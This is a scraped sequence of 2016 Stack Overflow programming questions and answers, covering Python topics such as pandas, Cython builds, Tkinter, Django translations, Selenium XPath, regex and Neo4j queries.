<p><strong>Pure python way without the use of numpy:</strong></p> <p>As you need the lists flattened we use this function (as already mentioned):</p> <pre><code>def flatten_list(li): return [el for sub_li in li for el in sub_li] </code></pre> <p>We know we can retrieve the first section like this:</p> <pre><code>flatten_list([a[row][0:3] for row in range(3)]) # retrieves the first section &gt;&gt;&gt; [1, 3, 2, 4, 9, 8, 7, 5, 6] </code></pre> <p>and all left_sections like:</p> <pre><code>[flatten_list([a[row][0:3] for row in range(y*3, y*3+3)]) for y in range(3)] &gt;&gt;&gt; [[1, 3, 2, 4, 9, 8, 7, 5, 6], [6, 4, 3, 5, 2, 1, 9, 8, 7], [2, 1, 4, 3, 6, 5, 8, 7, 9]] </code></pre> <p>all together:</p> <pre><code>[[flatten_list([a[row][x*3:x*3+3] for row in range(y*3, y*3+3)]) for y in range(3)] for x in range(3)] &gt;&gt;&gt; [[[1, 3, 2, 4, 9, 8, 7, 5, 6], [6, 4, 3, 5, 2, 1, 9, 8, 7], [2, 1, 4, 3, 6, 5, 8, 7, 9]], [[5, 7, 9, 2, 6, 1, 3, 8, 4], [1, 5, 8, 7, 9, 3, 4, 2, 6], [9, 3, 5, 8, 1, 7, 6, 4, 2]], [[4, 6, 8, 3, 7, 5, 2, 1, 9], [7, 9, 2, 8, 4, 6, 5, 3, 1], [6, 8, 7, 9, 2, 4, 1, 5, 3]]] </code></pre>
0
2016-07-21T10:34:11Z
[ "python", "list", "numpy" ]
How do you convert a CSV file into a 2d array in a .js file?
38,499,489
<p>I have this csv file that looks a bit like this: </p> <pre><code>1,2,3 3,4,5 5,6,7 </code></pre> <p>and I need to convert it (preferably in python) to a .js file array that looks more like this: </p> <pre><code>var variable1 = [ [1,2,3], [3,4,5], [5,6,7], ]; </code></pre> <p>I'm very new to programming, so any guidance would be very helpful! Thanks so much!</p>
0
2016-07-21T08:54:04Z
38,499,542
<p>You have to open your csv file, then read the lines and write them in your js file.</p> <p>Basically:<br/> -> Open csv file<br/> -> Create js file<br/> -> Write 'var variable1 = [' in your js file<br/> -> Iterate on csv lines<br/> -> Write them in your js file<br/> -> Write '];' in your js file<br/> -> Close the files</p> <p>In python:</p> <pre><code>myJSFile = open('Path_to_your_js_file', 'w') myJSFile.write("var variable1 = [\n") myCSVFile = open('Path_to_your_csv_file', 'r') for line in myCSVFile .readlines() : myJSFile.write("[%s],\n" % line.strip()) myJSFile.write("];") myJSFile.close() myCSVFile.close() </code></pre> <p>That should do the work ;)</p>
0
2016-07-21T08:57:23Z
[ "javascript", "python", "arrays", "csv" ]
fatal error: 'mymodule.h' file not found - Cython compile fails to find header
38,499,517
<p>so I've been trying to get a simple script running, where I incorporate C-code into my python project using Cython 0.24 under MacOS 10.11.5 (El Capitan). I edit the code with PyCharm with Python Version 2.7.10. My setup.py looks like this</p> <pre><code>from distutils.core import setup from distutils.extension import Extension from Cython.Distutils import build_ext from Cython.Build import cythonize import os dirs = [os.getcwd()] ext = [Extension("hello_world", include_dirs=dirs, sources=["mymodule.c","hello_world.pyx"], depends=["mymodule.h"])] setup( name = "testing", cmdclass={'build_ext' : build_ext}, ext_modules = cythonize(ext) ) </code></pre> <p>It generates the hello_world.c just fine and also generates a build directory and an *.so file The *.pyx file contains the following definition, which obviously matches the definition in mymodule.h</p> <pre><code>cdef extern from "mymodule.h": cdef float MyFunction(float, float) </code></pre> <p>I tried the solution suggested here: <a href="http://stackoverflow.com/questions/22697440/cc-failed-with-exit-status-1-error-when-install-python-library">&quot;&#39;cc&#39; failed with exit status 1&quot; error when install python library</a></p> <pre><code>export CFLAGS=-Qunused-arguments export CPPFLAGS=-Qunused-arguments </code></pre> <p>and the custom extension solution already in above code came from here: <a href="http://stackoverflow.com/questions/31276470/compiling-cython-with-c-header-files-error">Compiling Cython with C header files error</a></p> <p>I also tried a MacOS specific solution suggested here, but that was just desperation: <a href="https://github.com/wesm/feather/issues/61" rel="nofollow">https://github.com/wesm/feather/issues/61</a></p> <pre><code>export MACOSX_DEPLOYMENT_TARGET=10.11 </code></pre> <p>But unfortunately it still won't work. I am sure that Cython is working properly because I implemented some functions beforehand and could call them just fine, when the implementation was in Cython. It's just including actual C code, where this problem occurs for me. </p> <p>I hope someone can help me, thanks in advance!</p> <p>edit: I get the following error messages</p> <pre><code>/Users/Me/.pyxbld/temp.macosx-10.11-intel-2.7/pyrex/hello_world.c:263:10: fatal error: 'mymodule.h' file not found #include "mymodule.h" ^ 1 error generated. Traceback (most recent call last): File "/Users/Me/Dropbox/Uni/MasterThesis/PythonProjects/cython_hello_world/main.py", line 3, in &lt;module&gt; import hello_world File "/Users/Me/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 445, in load_module language_level=self.language_level) File "/Users/Me/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 234, in load_module exec("raise exc, None, tb", {'exc': exc, 'tb': tb}) File "/Users/Me/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 216, in load_module inplace=build_inplace, language_level=language_level) File "/Users/Me/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 192, in build_module reload_support=pyxargs.reload_support) File "/Users/Me/Library/Python/2.7/lib/python/site-packages/pyximport/pyxbuild.py", line 102, in pyx_to_dll dist.run_commands() File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/distutils/dist.py", line 953, in run_commands self.run_command(cmd) File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/distutils/dist.py", line 972, in run_command cmd_obj.run() File "/Users/Me/Library/Python/2.7/lib/python/site-packages/Cython/Distutils/build_ext.py", line 164, in run _build_ext.build_ext.run(self) File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/distutils/command/build_ext.py", line 337, in run self.build_extensions() File "/Users/Me/Library/Python/2.7/lib/python/site-packages/Cython/Distutils/build_ext.py", line 172, in build_extensions self.build_extension(ext) File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/distutils/command/build_ext.py", line 496, in build_extension depends=ext.depends) File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/distutils/ccompiler.py", line 574, in compile self._compile(obj, src, ext, cc_args, extra_postargs, pp_opts) File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/distutils/unixccompiler.py", line 122, in _compile raise CompileError, msg ImportError: Building module hello_world failed: ["CompileError: command 'cc' failed with exit status 1\n"] </code></pre>
1
2016-07-21T08:56:14Z
38,505,376
<p>I solved it on my own. The problem was actually not in the code I posted here but in the code calling the function. I had the lines</p> <pre><code>import pyximport pyximport.install() </code></pre> <p>still in the code before calling the function in hello_world. This seems to have caused the problem. When I removed those two lines, the function could be called just fine.</p>
0
2016-07-21T13:18:08Z
[ "python", "c", "osx", "pycharm", "cython" ]
How to store missing date(15 min interval) points from csv into new file (15 minutes interval) -python 3.5
38,499,546
<p>I am new to python so some ideas to move forward would be much appreciated</p> <p>Problem: I have 44 locations with production data per day (15 mins interval) for the months for dec to june. The total data points for one day should be 4224(44 [locations]*4 [15 intervals]*24 [hrs in day]), but that is not the case and some data is missing. I need to filter these dates out. </p> <p>Sample data I have in a csv file is show below: the date ranges from dec to june </p> <pre><code> datetime production 0 07-12-15 0:15 240 1 07-12-15 0:15 328 2 07-12-15 0:15 54 3 07-12-15 0:30 103 4 07-12-15 0:30 10 </code></pre> <p>This is just the sample to understand the data format(actual file goes till june 2016), 0:15 is 15 minutes time step and 0 is hrs, </p> <p>my draft code:</p> <pre><code>df=pd.read_csv("file_path") df.set_index('datetime',inplace=True) startdate = pd.Timestamp('2015-12-1 00:15:00', tz='UTC') enddate = pd.Timestamp('2016-06-30 22:00:00', tz='UTC') daterange = pd.date_range(start=startdate, end=enddate, freq='15T', tz='UTC') for row in df.iterrows(): for single_date in daterange: if single_date = 4224: print("all fine") else: print (single_date) </code></pre> <p>I am still thinking about the selection of date.</p>
-10
2016-07-21T08:57:42Z
38,501,900
<p>try this:</p> <pre><code>In [16]: df.ix[df.groupby(df['datetime'].dt.date)['production'].transform('nunique') &lt; 44 * 4 * 24, 'datetime'].dt.date.unique() Out[16]: array([datetime.date(2015, 12, 7)], dtype=object) </code></pre> <p>this will give you all rows for the "problematic" days:</p> <pre><code>df[df.groupby(df['datetime'].dt.date)['production'].transform('nunique') &lt; 44 * 4 * 24] </code></pre> <p>PS there is a good reason why people asked you for a good reproducible sample data sets - with the one you have provided it's hardly possible to see whether the code is working correctly or not... </p>
0
2016-07-21T10:34:39Z
[ "python", "pandas", "dataframe" ]
Converting all occurrence of True/False to 1/0 in a dataframe with mixed datatype
38,499,747
<p>I have a dataframe that has about 100 columns, There are some boolean columns and some chars. I want to replace all boolean having values True/False and also -1 with 1/0. I want to apply it on whole dataframe instead of single column.</p> <p>I saw some solutions here, like converting the column to integer. But I want to avoid the exercise of going through 100s of columns.</p> <p>Here is something i tried unsuccessfully:</p> <pre><code>test.applymap(lambda x: 1 if x=='True' else x) test.applymap(lambda x: 0 if x=='False' else x) </code></pre> <p>But the dataframe test still has True/False</p>
0
2016-07-21T09:07:12Z
38,499,855
<p><code>applymap</code> is not in-place by default, it will return a new dataframe.</p> <p>The correct way:</p> <pre><code>test = test.applymap(lambda x: 1 if x == True else x) test = test.applymap(lambda x: 0 if x == False else x) </code></pre> <p>or</p> <pre><code>test = test.applymap(lambda x: 1 if x == True else x).test.applymap(lambda x: 0 if x=='False' else x) </code></pre> <p>or simply</p> <pre><code>test.applymap(lambda x: 1 if x == True else x, inplace=True) test.applymap(lambda x: 0 if x == False else x, inplace=True) </code></pre> <p><br/></p> <p>Although <code>replace</code> seems the best way of achieving this:</p> <pre><code>test.replace(False, 0, inplace=True) </code></pre>
1
2016-07-21T09:11:30Z
[ "python", "data-manipulation" ]
How to use pandas apply function on all columns of some rows of data frame
38,499,890
<p>I have a <code>dataframe</code>. I want to replace values of all columns of some rows to a default value. Is there a way to do this via <code>pandas apply</code> function</p> <p>Here is the dataframe</p> <pre><code>import pandas as pd temp=pd.DataFrame({'a':[1,2,3,4,5,6],'b':[2,3,4,5,6,7],'c':['p','q','r','s','t','u']}) mylist=['p','t'] </code></pre> <p>How to replace values in columns <code>a</code> and <code>b</code>to default value 0,where value of column <code>c</code> is in <code>mylist</code></p> <p>Is there a way to do this using pandas functionality,avoiding for loops</p>
1
2016-07-21T09:12:45Z
38,499,928
<p>Use <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.isin.html" rel="nofollow"><code>isin</code></a> to create a boolean mask and use <code>loc</code> to set the rows that meet the condition to the desired new value:</p> <pre><code>In [37]: temp.loc[temp['c'].isin(mylist),['a','b']] = 0 temp Out[37]: a b c 0 0 0 p 1 2 3 q 2 3 4 r 3 4 5 s 4 0 0 t 5 6 7 u </code></pre> <p>result of the inner <code>isin</code>:</p> <pre><code>In [38]: temp['c'].isin(mylist) Out[38]: 0 True 1 False 2 False 3 False 4 True 5 False Name: c, dtype: bool </code></pre>
2
2016-07-21T09:14:44Z
[ "python", "pandas", "data-manipulation" ]
How to use pandas apply function on all columns of some rows of data frame
38,499,890
<p>I have a <code>dataframe</code>. I want to replace values of all columns of some rows to a default value. Is there a way to do this via <code>pandas apply</code> function</p> <p>Here is the dataframe</p> <pre><code>import pandas as pd temp=pd.DataFrame({'a':[1,2,3,4,5,6],'b':[2,3,4,5,6,7],'c':['p','q','r','s','t','u']}) mylist=['p','t'] </code></pre> <p>How to replace values in columns <code>a</code> and <code>b</code>to default value 0,where value of column <code>c</code> is in <code>mylist</code></p> <p>Is there a way to do this using pandas functionality,avoiding for loops</p>
1
2016-07-21T09:12:45Z
38,500,147
<p>NumPy based method would be to use <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.in1d.html" rel="nofollow"><code>np.in1d</code></a> to get such a mask and use it like so -</p> <pre><code>mask = np.in1d(temp.c,mylist) temp.ix[mask,temp.columns!='c'] = 0 </code></pre> <p>This will replace in all columns except <code>'c'</code>. If you are looking to replace in specific columns, say <code>'a'</code> and <code>'b'</code>, edit the last line to -</p> <pre><code>temp.ix[mask,['a','b']] = 0 </code></pre>
1
2016-07-21T09:23:52Z
[ "python", "pandas", "data-manipulation" ]
Flask Socket IO encryption
38,499,954
<p>How to encrypt everything that passes through socket between my server and clients? I'm using Flask's socket.io on server and Swift socket.io on clients.</p>
-3
2016-07-21T09:15:59Z
38,502,220
<p>You should use the secure <code>wss://</code> (WebSockets over SSL/TLS) protocol instead of <code>ws://</code>. Just like <code>https://</code> it is also encrypted. If you are using <code>https://</code> by default you can only use <code>wss://</code>.</p>
0
2016-07-21T10:49:05Z
[ "python", "swift", "encryption", "flask", "socket.io" ]
Python Tkinter buttons - no text
38,499,965
<p>I'm having a bit of a play with tkinter buttons. Im wanting to insert some buttons into a clock script I have.</p> <p>Inserting the button Exit (3rd line from bottom) inserts a button ok, and the button works, but it refuses to show any text on the button.</p> <p>How can I show text on this button?</p> <pre><code>import sys if sys.version_info[0] == 2: from Tkinter import * import Tkinter as tk else: from tkinter import * import tkinter as tk from time import * fontsize=75 fontname="Comic Sans MS" #font name - use Fontlist script for names fontweight="bold" #"bold" for bold, "normal" for normal fontslant="roman" #"roman" for normal, "italic" for italics def quit(): clock.destroy() def getTime(): day = strftime("%A") date = strftime("%d %B %Y") time = strftime("%I:%M:%S %p") text.delete('1.0', END) #delete everything text.insert(INSERT, '\n','mid') text.insert(INSERT, day + '\n', 'mid') #insert new time and new line text.insert(INSERT, date + '\n', 'mid') text.insert(INSERT, time + '\n', 'mid') clock.after(900, getTime) #wait 0.5 sec and go again clock = tk.Tk() # make it cover the entire screen w= clock.winfo_screenwidth() h= clock.winfo_screenheight() clock.overrideredirect(1) clock.geometry("%dx%d+0+0" % (w, h)) clock.focus_set() # &lt;-- move focus to this widget clock.bind("&lt;Escape&gt;", lambda e: e.widget.quit()) text = Text(clock, font=(fontname, fontsize, fontweight, fontslant)) text.grid(column = 1, columnspan = 1, row = 2, rowspan = 1, sticky='') Exit = Button(clock, text="Close Tkinter Window", width = w, height = 1, command=quit).grid(row = 1, rowspan = 1, column = 1, columnspan = w) clock.after(900, getTime) clock.mainloop() </code></pre>
0
2016-07-21T09:16:28Z
38,510,629
<p>Sort of solved it. The button was showing text - it was just off the screen. Solved it by adjusting the width of the tkinter text window and the buttons.</p>
1
2016-07-21T17:23:36Z
[ "python", "tkinter" ]
Python Tkinter buttons - no text
38,499,965
<p>I'm having a bit of a play with tkinter buttons. Im wanting to insert some buttons into a clock script I have.</p> <p>Inserting the button Exit (3rd line from bottom) inserts a button ok, and the button works, but it refuses to show any text on the button.</p> <p>How can I show text on this button?</p> <pre><code>import sys if sys.version_info[0] == 2: from Tkinter import * import Tkinter as tk else: from tkinter import * import tkinter as tk from time import * fontsize=75 fontname="Comic Sans MS" #font name - use Fontlist script for names fontweight="bold" #"bold" for bold, "normal" for normal fontslant="roman" #"roman" for normal, "italic" for italics def quit(): clock.destroy() def getTime(): day = strftime("%A") date = strftime("%d %B %Y") time = strftime("%I:%M:%S %p") text.delete('1.0', END) #delete everything text.insert(INSERT, '\n','mid') text.insert(INSERT, day + '\n', 'mid') #insert new time and new line text.insert(INSERT, date + '\n', 'mid') text.insert(INSERT, time + '\n', 'mid') clock.after(900, getTime) #wait 0.5 sec and go again clock = tk.Tk() # make it cover the entire screen w= clock.winfo_screenwidth() h= clock.winfo_screenheight() clock.overrideredirect(1) clock.geometry("%dx%d+0+0" % (w, h)) clock.focus_set() # &lt;-- move focus to this widget clock.bind("&lt;Escape&gt;", lambda e: e.widget.quit()) text = Text(clock, font=(fontname, fontsize, fontweight, fontslant)) text.grid(column = 1, columnspan = 1, row = 2, rowspan = 1, sticky='') Exit = Button(clock, text="Close Tkinter Window", width = w, height = 1, command=quit).grid(row = 1, rowspan = 1, column = 1, columnspan = w) clock.after(900, getTime) clock.mainloop() </code></pre>
0
2016-07-21T09:16:28Z
38,515,364
<p>The value of <code>w</code> (<code>clock.winfo_screenwidth()</code>) is too wide for a button width. It just slides the name of the button too much to the left. So change the width of the button to a smaller number (200), and add <code>sticky=W</code> to the <code>grid</code>, so it won't slide too much anymore. Meanwhile, the width of the button will cover the whole width of the parent window (as you wish). So here's what to replace:<br></p> <pre><code>Exit = Button(clock, text="Close Tkinter Window", width = 200, height = 1, command=quit).grid(row = 1, rowspan = 1, column = 1, columnspan = w, sticky=W) </code></pre>
0
2016-07-21T22:26:42Z
[ "python", "tkinter" ]
Webcam Iris Detection with Hough Circles in Python OpenCV
38,499,981
<p>I have managed to isolate a very specific bounding region for an eye with the help of dlib's facial landmark detector. However, I am not completely stumped on how to create a circular border around the iris itself. I have tried canny edge detection followed by hough circles but hough circles does not seem to be able to process the image, most likely due to the low resolution and partially obstructed iris (due to the eye lids of course). I have tried this with a higher resolution camera feed and it works, but due to the constraints of my project, it is not feasible to do this. Currently, this is the bounding region I have isolated. </p> <p>The first image is the eye looking straight at the webcam as shown below:</p> <p><a href="http://i.stack.imgur.com/xvY0M.png" rel="nofollow"><img src="http://i.stack.imgur.com/xvY0M.png" alt="enter image description here"></a></p> <p>The image below is the eye looking upwards:</p> <p><a href="http://i.stack.imgur.com/fOh8Y.png" rel="nofollow"><img src="http://i.stack.imgur.com/fOh8Y.png" alt="enter image description here"></a></p> <p>I am not looking for code, but if anyone could guide me as to what transformations on the image would be appropriate, I would greatly appreciate it.</p>
-1
2016-07-21T09:17:03Z
38,500,350
<p>You could use a threshold on the region before using the edge detector. Then you could use the hough circle transformation. If this does not work, an alternativ emay be to find contours and analyse the contour with cvFitEllipse</p>
0
2016-07-21T09:31:33Z
[ "python", "opencv", "image-processing", "hough-transform", "canny-operator" ]
How to add new column to existing csv file
38,500,090
<p>For instance, <strong>x</strong> is my data and <strong>r</strong> is supposed to be new data to be added.</p> <pre><code>import numpy as np x = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]], np.int32) np.savetxt("test.csv", x, fmt='%d', delimiter=',') r = [1,2,3] </code></pre> <p>how could I add it to that <strong>"test.csv"</strong></p>
0
2016-07-21T09:21:41Z
38,500,749
<p>You can insert a new column by using the <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.insert.html" rel="nofollow">insert function</a> in numpy like so</p> <pre><code>np.insert(x, 3, [r], axis=1) </code></pre>
1
2016-07-21T09:48:45Z
[ "python", "csv", "numpy", "append" ]
How to add new column to existing csv file
38,500,090
<p>For instance, <strong>x</strong> is my data and <strong>r</strong> is supposed to be new data to be added.</p> <pre><code>import numpy as np x = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]], np.int32) np.savetxt("test.csv", x, fmt='%d', delimiter=',') r = [1,2,3] </code></pre> <p>how could I add it to that <strong>"test.csv"</strong></p>
0
2016-07-21T09:21:41Z
38,518,607
<p>Isn't this just about adding a column to an existing 2d array. Writing it to a csv file is just a further step and isn't affected by this addition.</p> <pre><code>In [96]: x = np.array([[1, 2, 3], ...: [4, 5, 6], ...: [7, 8, 9]], np.int32) In [97]: r = [1,2,3] </code></pre> <p>There are a number of functions that can add a column to an array, but they all end up using <code>concatenate</code>. And knowing how to use <code>concatenate</code> directly is a good thing to know. The key is matching the number of dimensions.</p> <pre><code>In [98]: x1 = np.concatenate((x, np.array(r)[:,None]), axis=1) In [99]: x1 Out[99]: array([[1, 2, 3, 1], [4, 5, 6, 2], [7, 8, 9, 3]]) </code></pre> <p><code>vstack</code> takes care of turning <code>r</code> into this column array. <code>insert</code> is more general, allowing you to add values within the existing (not just at the end). But like <code>concatenate</code> (and all the stacks) it does not operate in-place.</p>
1
2016-07-22T05:09:47Z
[ "python", "csv", "numpy", "append" ]
Implementation of `Exception.__str__()` in Python
38,500,098
<p>I've never fully understood exception handling in Python (or any language to be honest). I was experimenting with custom exceptions, and found the following behaviour.</p> <pre><code>class MyError(Exception): def __init__(self, anything): pass me = MyError("iiiiii") print(me) </code></pre> <p>Output:</p> <pre><code>iiiiii </code></pre> <p>I assume that <code>print()</code> calls <code>Exception.__str__()</code>.</p> <p>How does the base class <code>Exception</code> know to print <code>iiiiii</code>? The string <code>"iiiiii"</code> was passed to the constructor of <code>MyError</code> via the argument <code>anything</code>, but <code>anything</code> isn't stored anywhere in <code>MyError</code> at all!</p> <p>Furthermore, the constructor of <code>MyError</code> does not call its superclass's (Exception's) constructor. So, how did <code>print(me)</code> print <code>iiiiii</code>?</p>
0
2016-07-21T09:21:55Z
38,500,203
<p>In Python 3, the <code>BaseException</code> class has a <code>__new__</code> method that stores the arguments in <code>self.args</code>:</p> <pre><code>&gt;&gt;&gt; me.args ('iiiiii',) </code></pre> <p>You didn't override the <code>__new__</code> method, only <code>__init__</code>. You'd need to override <strong>both</strong> to completely prevent from <code>self.args</code> to be set, as both implementations happily set that attribute:</p> <pre><code>&gt;&gt;&gt; class MyError(Exception): ... def __new__(cls, *args, **kw): ... return super().__new__(cls) # ignoring args and kwargs! ... def __init__(self, *args, **kw): ... super().__init__() # again ignoring args and kwargs ... &gt;&gt;&gt; me = MyError("iiiiii") &gt;&gt;&gt; me MyError() &gt;&gt;&gt; print(me) &gt;&gt;&gt; me.args () </code></pre> <p>In Python 2, exceptions do not implement <code>__new__</code> and your sample would not print anything. See <a href="https://bugs.python.org/issue1692335" rel="nofollow">issue #1692335</a> as to why the <code>__new__</code> method was added; basically to avoid issues like yours where the <code>__init__</code> method does not also call <code>super().__init__()</code>.</p> <p>Note that <code>__init__</code> is not a <em>constructor</em>; the instance is already constructed by that time, by <code>__new__</code>. <code>__init__</code> is merely the <em>initialiser</em>.</p>
1
2016-07-21T09:25:41Z
[ "python", "python-3.x", "exception" ]
How do I pass a string variable with apostrophe (') in a Xpath for Python-Selenium?
38,500,189
<p>I have a web table where I need to <code>click</code> the edit template icon (the one that looks like a notepad in the image below) for each row. The table looks like this.</p> <p><a href="http://i.stack.imgur.com/gkZqk.png" rel="nofollow"><img src="http://i.stack.imgur.com/gkZqk.png" alt=""></a></p> <p>My code checks for the text and then clicks the icon. I don't have any trouble with the first two but the last one gives an error of invalid xpath expression because of the apostrophe. Below is the code that I am using. The list 'form_titles' is created dynamically by detecting the <code>.xsn</code> files that I need to upload from my local folder to each of these forms one by one. Each 'form title' has its own unique <code>.xsn</code> file and I use a spreadsheet containing a pre-compiled list for referring each <code>.xsn</code> file to its 'form title'.</p> <pre><code>form_titles = ["3.08 Incident Estimates", "3.09 Quotation by the Consultant", "3.10 Employer's Assessment"] for form in form_titles: try: WebDriverWait(browser, 60).until(EC.presence_of_element_located((By.XPATH, "//td[contains(text(),'%s')]" % (form)))) finally: browser.find_element_by_xpath("//td[contains(text(),'%s')]/following-sibling::td/a[contains(@onclick, 'editProjectFormType')]" % (form)).click() time.sleep(30) </code></pre>
2
2016-07-21T09:25:13Z
38,500,656
<p>You should use <code>\</code> to escape <code>""</code> char as below :-</p> <pre><code>form_titles = ["3.08 Incident Estimates", "3.09 Quotation by the Consultant", "3.10 Employer's Assessment"] for form in form_titles: try: WebDriverWait(browser, 60).until(EC.presence_of_element_located((By.XPATH, "//td[contains(text(),\"%s\")]" % (form)))) finally: browser.find_element_by_xpath("//td[contains(text(),\"%s\")]/following-sibling::td/a[contains(@onclick, 'editProjectFormType')]" % (form)).click() time.sleep(30) </code></pre> <p>Hope it helps...:)</p>
2
2016-07-21T09:44:38Z
[ "python", "selenium", "xpath" ]
Django seems to escape HTML characters (but is not supposed to)
38,500,192
<p>After upgrading Django from 1.8 to 1.9.8 (and also upgrading a bunch of modules in the process), I've got an issue with my translations inside templates.</p> <p>With the <code>Foobar</code> key associated with the <code>foo&lt;br&gt;bar</code> string, the code:</p> <pre><code>&lt;p&gt;{% i18n 'Foobar' %}&lt;/p&gt; </code></pre> <p>was working great before the upgrade, displaying:</p> <pre><code>foo bar </code></pre> <p>But now, it displays:</p> <pre><code>foo&lt;br&gt;bar </code></pre> <p>Any idea?</p>
0
2016-07-21T09:25:16Z
38,500,881
<p>OK, thanks to Bestasttung's comment, I solved my problem with this:</p> <pre><code>{% autoescape off %} &lt;p&gt;{% i18n 'Foobar' %}&lt;/p&gt; {% endautoescape %} </code></pre> <p>But that wasn't very satisfying since I had multiple templates to update. So, I simply changed my <code>i18n</code> method from:</p> <pre><code>def i18n(context, key): ... return s </code></pre> <p>to:</p> <pre><code>def i18n(context, key): ... return mark_safe(s) </code></pre> <p>I hope that will help someone facing the same issue.</p>
1
2016-07-21T09:54:18Z
[ "python", "django", "localization", "translation" ]
Strange result of re.match()
38,500,330
<p>`</p> <pre><code>t='1111 si debiteur' import re re.match(r"si débiteur",t) is None #gives back True as a result re.match(r"1111 si débiteur",t) is None #gives back True as a result re.match(r"1111 si débiteur",t) is not None #gives back False as a result t='8588' re.match(r"1111 si débiteur",t) is None #gives back True as a result </code></pre> <p>`<a href="http://i.stack.imgur.com/53M4H.png" rel="nofollow"></a></p> <p>the thing is i don't really get why "re.match(r"1111 si débiteur",t) is None" returning True in both case</p>
-1
2016-07-21T09:30:50Z
38,500,484
<p>The value of t: <code>1111 si debiteur</code> does not have an <em>accent</em>. Where <code>re.match(r"1111 si débiteur",t)</code> does.</p>
1
2016-07-21T09:37:27Z
[ "python" ]
Python and Neo4j first 10 Elements
38,500,384
<p>Is it Possible to select first 10 entries of Neo4j graph just like we do in a Document oriented Database? </p>
0
2016-07-21T09:32:55Z
38,500,561
<p>When using a Cypher query, you can use the <a href="http://neo4j.com/docs/developer-manual/3.0/#query-limit" rel="nofollow"><code>LIMIT</code></a> <a href="http://neo4j.com/docs/cypher-refcard/3.0/" rel="nofollow">clause</a> to complement <code>RETURN</code>:</p> <pre><code>MATCH (n:SomeLabel) RETURN n LIMIT 10 </code></pre>
1
2016-07-21T09:40:42Z
[ "python", "neo4j" ]
New origin of imshow after set_data()
38,500,415
<p>i have a very strange problem. After setting the data of my imshow instace, the origin is changed from 'upper' to 'lower' and i did not manage to reverse it again. Any ideas?</p> <p>Here is my code:</p> <pre><code>im = ax.imshow(data) ax.set_xlim(0, new_data.shape[1]) ax.set_ylim(0, new_data.shape[0]) im.set_extent((0, new_data.shape[1], 0, new_data.shape[0])) im.set_data(new_data) </code></pre>
0
2016-07-21T09:34:35Z
38,501,842
<p>I solved it myself. Just swap the values in set_extent() and leave out the set_xim and set_ylim :</p> <pre><code>im = ax.imshow(data) im.set_extent((0, new_data.shape[1], new_data.shape[0], 0)) im.set_data(new_data) </code></pre>
0
2016-07-21T10:32:18Z
[ "python", "matplotlib", "rotation", "imshow" ]
Replace word between two substrings (keeping other words)
38,500,616
<p>I'm trying to replace a word (e.g. <code>on</code>) if it falls between two substrings (e.g. <code>&lt;temp&gt;</code> &amp; <code>&lt;/temp&gt;</code>) however other words are present which need to be kept.</p> <pre><code>string = "&lt;temp&gt;The sale happened on February 22nd&lt;/temp&gt;" </code></pre> <p>The desired string after the replace would be:</p> <pre><code>Result = &lt;temp&gt;The sale happened {replace} February 22nd&lt;/temp&gt; </code></pre> <p>I've tried using regex, I've only been able to figure out how to replace everything lying between the two <code>&lt;temp&gt;</code> tags. (Because of the <code>.*?</code>)</p> <pre><code>result = re.sub('&lt;temp&gt;.*?&lt;/temp&gt;', '{replace}', string, flags=re.DOTALL) </code></pre> <p>However <code>on</code> may appear later in the string not between <code>&lt;temp&gt;&lt;/temp&gt;</code> and I wouldn't want to replace this.</p>
2
2016-07-21T09:42:51Z
38,501,144
<pre><code>re.sub('(&lt;temp&gt;.*?) on (.*?&lt;/temp&gt;)', lambda x: x.group(1)+" &lt;replace&gt; "+x.group(2), string, flags=re.DOTALL) </code></pre> <p>Output:</p> <pre><code>&lt;temp&gt;The sale happened &lt;replace&gt; February 22nd&lt;/temp&gt; </code></pre> <p><strong>Edit:</strong></p> <p>Changed the regex based on suggestions by Wiktor and HolyDanna.</p> <p>P.S: Wiktor's comment on the question provides a better solution.</p>
0
2016-07-21T10:04:29Z
[ "python", "regex" ]
Replace word between two substrings (keeping other words)
38,500,616
<p>I'm trying to replace a word (e.g. <code>on</code>) if it falls between two substrings (e.g. <code>&lt;temp&gt;</code> &amp; <code>&lt;/temp&gt;</code>) however other words are present which need to be kept.</p> <pre><code>string = "&lt;temp&gt;The sale happened on February 22nd&lt;/temp&gt;" </code></pre> <p>The desired string after the replace would be:</p> <pre><code>Result = &lt;temp&gt;The sale happened {replace} February 22nd&lt;/temp&gt; </code></pre> <p>I've tried using regex, I've only been able to figure out how to replace everything lying between the two <code>&lt;temp&gt;</code> tags. (Because of the <code>.*?</code>)</p> <pre><code>result = re.sub('&lt;temp&gt;.*?&lt;/temp&gt;', '{replace}', string, flags=re.DOTALL) </code></pre> <p>However <code>on</code> may appear later in the string not between <code>&lt;temp&gt;&lt;/temp&gt;</code> and I wouldn't want to replace this.</p>
2
2016-07-21T09:42:51Z
38,501,158
<p>Try <a href="http://lxml.de/tutorial.html" rel="nofollow"><code>lxml</code></a>:</p> <pre><code>from lxml import etree root = etree.fromstring("&lt;temp&gt;The sale happened on February 22nd&lt;/temp&gt;") root.text = root.text.replace(" on ", " {replace} ") print(etree.tostring(root, pretty_print=True)) </code></pre> <p>Output:</p> <pre><code>&lt;temp&gt;The sale happened {replace} February 22nd&lt;/temp&gt; </code></pre>
0
2016-07-21T10:05:11Z
[ "python", "regex" ]
Wrong python packages path for opencv cmake installation
38,500,617
